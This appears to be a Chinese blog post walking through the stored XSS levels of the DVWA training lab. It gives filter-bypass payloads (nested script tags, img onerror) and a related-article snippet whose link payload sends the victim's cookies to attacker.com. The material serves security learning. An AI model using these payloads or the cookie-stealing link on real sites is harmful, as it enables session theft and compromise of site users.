2020.9.21-web-DVWA存储型XSS漏洞

最新推荐文章于 2025-05-19 18:16:28 发布
最新推荐文章于 2025-05-19 18:16:28 发布
阅读量244 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_49965414/article/details/108720795
本文详细介绍了存储型XSS漏洞的不同防护级别,包括low、medium、high及impossible级别的防护手段与绕过方法,如使用htmlspecialchars函数及正则匹配等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

存储型xss漏洞:
low:
在这里插入图片描述
name和message都没有任何防御,直接怼上去。

<script>alert(1)</script>

在这里插入图片描述
存储型xss就是会将攻击脚本永远地存放在目标服务器的数据库或文件中,每次访问都会给你弹窗。
在这里插入图片描述
清理数据后进入medium级别:
在这里插入图片描述

出现了htmlspecialchars函数,不过只作用在message上,并不作用在name上。
而name上有str_replace函数,还有字符数的限制,也就是说应该是写不完

<script>alert(1)</script>

但是这个限制是在html上设置的,所以我们可以找到所在的html代码

<sc<script>ript>alert(1)</script>

在这里插入图片描述

high级别:
在这里插入图片描述
message已经防住了,但是name还是没有防住,只用了个pre_replace正则匹配过滤掉script而已。
这里用img绕过语句就可以了。同时这里的name也有字符数的限制,但是我们可以换一种方法,不用再去找限制的html源码,可以直接在burp上怼进去。
在这里插入图片描述
将txtName修改为<img src=1 onerror=alert(1)>
在这里插入图片描述
impossible:就已经把name防住了,加上了htmlspecialchars()函数了

Kali linux 学习笔记(五十二)Web渗透——XSS 2020.3.30
闵行小鱼塘
03-30 811
学习XSS
攻防世界-web高手进阶区
zji
04-25 7058
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
Web安全之DVWA入门
03-10
web安全之dvwa入门篇书籍,小白学习中的好书籍!!!!
【白帽子学习笔记13】DVWA 存储XSS(跨站点脚本攻击)
python_LC_nohtyp的博客
06-16 631
【白帽子学习笔记13】DVWA 存储XSS(跨站点脚本攻击) 文章目录【白帽子学习笔记13】DVWA 存储XSS(跨站点脚本攻击)什么是存储XSSDVWA实战安全级别:LOW安全级别:M 什么是存储XSS 长时间存储在服务器端 每次用户访问都会被执行javascript脚本 DVWA实战 安全级别:LOW 安全级别:M ...
Web渗透】DVWA搭建详细教程
最新发布
Aluxian_的博客
05-19 1419
DVWA(Damn Vulnerable Web Application)是一款专为渗透测试和安全研究设计的开源平台,模拟了常见的Web应用漏洞,如SQL注入、XSS、文件上传等。本文详细介绍了在Windows系统下使用PHPStudy搭建DVWA的步骤,包括下载源码、配置数据库、修改配置文件等。搭建完成后,用户可以通过默认账户登录,选择不同安全级别进行渗透测试练习。DVWA是学习Web安全的理想工具,适合初学者和进阶者使用。搭建过程中需注意环境配置和权限管理,遇到问题时可检查相关日志文件。
Web应用安全 -- DVWA部署(Linux、Docker版)
luckcxy的专栏
09-13 2149
一、DVWA简介 Damn Vulnerable Web Application (DVWA)(译注:可以直译为:"该死的"不安全Web应用网站),是一个编码糟糕的、易受攻击的 PHP/MySQL Web应用程序。 它的主要目的是帮助安全专业人员在合法的环境中,测试他们的技能和工具,帮助 Web 开发人员更好地了解如何增强 Web 应用程序的安全性,并帮助学生和教师在受控的课堂环境中,了解 Web 应用程序的安全。 二、场景模块简介 DVWA主要包含以下场景模块: 1.Bruce For...
WEB漏洞靶场的搭建DVWA(一)
qq_59611876的博客
12-14 1252
带大家快速了解以及实战WEB渗透测试
web基础—dvwa靶场(五)File Upload
m0_74080781的博客
09-17 2021
在向网页上传文件时,如果服务器端代码未对客户端上传的文件进行严格的验证和过滤,就容易被上传上来的脚本文件等木马攻击。这类脚本称之为 WebShell,用户可以利用这种恶意脚本查看服务器目录、修改服务器文件和执行系统命令等。为了防御这种攻击,可以使用白名单判断文件类和后缀是否合法,同时对上传后的文件进行重命名防止被攻击者利用。
DVWA(Damn Vulnerable Web Application)程序源码v1.9稳定版.zip
02-03
DVWA的"Cross Site Scripting"部分涵盖了反射XSS存储XSS,通过模拟真实场景帮助用户了解如何防止此类攻击。 3. **文件包含漏洞**:DVWA的"File Inclusion"模块让用户了解文件包含漏洞的危害。通过不当的动态...
爆破,命令执行与dvwa靶场
ing_end的博客
02-11 4037
爆破 web21 题目:爆破什么的,都是基操 我们尝试抓包 我们发现用户名和密码被加密,用burp自带解码工具解码 发现用户名和密码中间用冒号隔开 爆破成功 web22 题目:域名也可以爆破的,试试爆破这个ctf.show的子域名 页面失效,提交flag{ctf_show_web} web23 题目:还爆破?这么多代码,告辞! <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-03 11:4
2020年前端面试题及答案(一)
webbeizi的博客
07-02 1835
一 大纲 1、前言 2、前端工程化 3、前端设计模式 4、前端安全性问题 5、前端跨域问题 6、前端数据加密 7、前端http相关问题 8、*前端基础知识点面试题 9、前端技术栈问题 前言 由于新冠肺炎疫情,现在成天呆在家里,加上也要准备面试,就在家里看面试题,看着网上一堆面试题,决定收集常见题目汇总一下。关于面试大纲,我认为每个人都是千差万别的。因为面试官都是对简历所写的项目经验进行深挖或者对你所掌握的基本技能进行考察。 前端工程化 1 什么是"前端工程化"? 前端工程化是使用软件工程的技术和方法来进行前
DVWAWeb 渗透的靶机环境)+csrf漏洞练习
热门推荐
net的博客
03-16 1万+
用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。十个攻击模块,分别是:1、Brute Force(暴力(破解))、2、Command Injection(命令行注入)、3、CSRF(跨站请求伪造)、4、- File Inclusion(文件包含)、5、File Upload(文件上传)、6、Insecure CAPTCHA (不安全的验证码)、
通过DVWA学习XSS
weixin_50464560的博客
03-14 1113
简介 这篇文章通过 dvwa 简单研究了三种类xss,并且讲述了如何利用 xss 获取目标网站用户的 cookie。 dvwa反射xss 测试环境 一台 win2003 虚拟机,ip 为 192.168.50.128,用wamp集成环境将dvwa搭在8080端口。 一台 win7 虚拟机,ip 为 192.168.50.150,用来接受漏洞网站的cookie,web由phpstudy搭建。 low级别 为了便于理解,代码如下: <?php // ..
web安全——01 DVWA的搭建
mimiczhang的博客
03-02 875
在学习web安全时,刚开始的各种SQL注入,XSS攻击等听得云里雾里的,完全达不到效果,因为光听不练假把式,不如自己上手来试试。所以接下来就进行DVWA的搭建。 DVWA的搭建 DWVA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助we...
7-1web安全-DVWA环境搭建
南风知我意
08-27 1425
最新DVWA环境搭建
DVWA靶场的XSS详解
Reset
05-11 1067
目录 反射 low medium high impossible 存储 low medium high impossible DOM low medium high impossible 反射 low 服务器代码: <?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET..
DVWA-xss详细讲解
qq_43395215的博客
05-08 1402
XSS,全称跨站脚本,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要修改的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储XSS与反射XSS。 博客地址:http://soliym.top/ XSS分类: 反射xss:只是简...
DVWA平台反射XSS实验
KUKULI233的博客
05-24 482
反射XSS 一、概念 XSS(跨站脚本攻击),攻击WEB客户端 注入客户端脚本代码 可以做到盗取cookie,重定向等 脚本语言javascript 黑客给服务器发送一个JS脚本,服务器就会回一个页面,将这个页面发给用户,用户在访问服务器时就会被执行盗取cookie值的JS脚本,黑客监听即能看到 前几步相同,用户访问服务器时被重定向到第三方网站 二、使用场景: DVWA级别调到low 直接嵌入<script>alert(‘xss’)</script> 元素事件<body
【网络安全零基础入门教程】之Web安全渗透测试-pikachu&DVWA靶场搭建教程,网络安全零基础入门到精通,收藏这一篇就够了!
A13531922962的博客
11-26 1416
这是我给粉丝盆友们整理的网络安全渗透测试入门阶段,远程代码执行渗透与防御的基础教程。对于web安全刚入门的小伙伴来说,漏洞靶场搭建是很重要的,可以通过靶场学以致用,对所学知识点进行巩固练习。下面和我一起搭建5个比较常用的初学者入门靶场。
dvwa存储XSS钓鱼攻击模拟 .
02-08
### DVWA 存储 XSS 钓鱼攻击模拟实验教程 #### 实验环境准备 为了进行存储XSS钓鱼攻击的模拟实验,需先设置好DVWA(Damn Vulnerable Web Application)平台。确保已安装并配置完毕该应用,并调整安全性等级至`LOW`以便于测试。 #### 攻击原理说明 存储XSS是指攻击者提交含有恶意脚本的数据给Web应用程序,这些数据被保存在目标系统的数据库或其他持久化存储介质内[^1]。每当有新访客加载包含此有害内容的页面时,浏览器便会自动执行嵌入式的JavaScript代码,无需任何额外交互动作即可实施攻击行为。 #### 构造Payload 针对此次实验目的——实现钓鱼功能,则可以创建一个看似合法却暗藏玄机的消息表单或链接作为payload。例如: ```html <a href="javascript:void(0)" onclick="window.location=&#39;http://attacker.com/stole?cookie=&#39;+document.cookie">点击领取奖品</a> ``` 这段HTML代码会在用户点击“点击领取奖品”的时候重定向到攻击者的站点并将当前用户的Cookie信息附加为查询参数传递过去[^3]。 #### 发布Payload 登录进入DVWA界面后找到能够发布留言的地方(比如Guestbook),将上述构造好的payload粘贴进去并提交。此时,这条消息已经被服务器接收并存入数据库等待其他用户触发。 #### 结果观察 一旦另一位受害者访问了带有未过滤输入项的页面,其浏览器将会解析并运行之前留下的恶意脚本,从而导致个人信息泄露等问题的发生。值得注意的是,在实际环境中应当严格遵循法律规范开展此类研究活动,严禁非法操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值